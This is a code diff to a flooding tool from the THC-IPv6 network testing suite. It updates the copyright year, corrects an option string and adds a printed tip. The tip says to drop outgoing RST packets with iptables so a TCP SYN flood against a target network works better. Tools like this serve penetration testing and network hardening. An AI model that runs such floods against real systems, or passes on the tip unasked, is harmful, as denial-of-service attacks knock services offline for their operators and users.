@@ -11,7 +11,7 @@
 #include "thc-ipv6.h"
 
 void help(char *prg) {
-  printf("%s %s (c) 2017 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
+  printf("%s %s (c) 2018 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
   printf("Syntax: %s [-aAcdDfrORS] [-m dstmac] [-p port] [-s sourceip6] interface target port\n\n", prg);
   printf("Options:\n");
   printf(" -a      add hop-by-hop header with router alert\n");
@@ -47,7 +47,7 @@ int main(int argc, char *argv[]) {
   setvbuf(stdout, NULL, _IONBF, 0);
   setvbuf(stderr, NULL, _IONBF, 0);
   
-   while ((i = getopt(argc, argv, "afAcrRsDSp:m:dfO")) >= 0) {
+   while ((i = getopt(argc, argv, "afAcrRs:DSp:m:dfO")) >= 0) {
      switch(i) {
        case 'a':
          alert = 8;
@@ -148,6 +148,8 @@ int main(int argc, char *argv[]) {
   }
 
   printf("Starting to flood target network with TCP%s%s %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", (type & TCP_SYN) > 0 ? "-SYN" : "", (type & TCP_ACK) > 0 ? "-ACK" : "", interface);
+  if (type == TCP_SYN)
+    printf("Remember to filter outgoing RST packets for SYN flooding, e.g. iptables -I OUTPUT -p tcp --tcp-flags RST RST -j DROP\n");  
   while (1) {
 
     if (randsrc) {
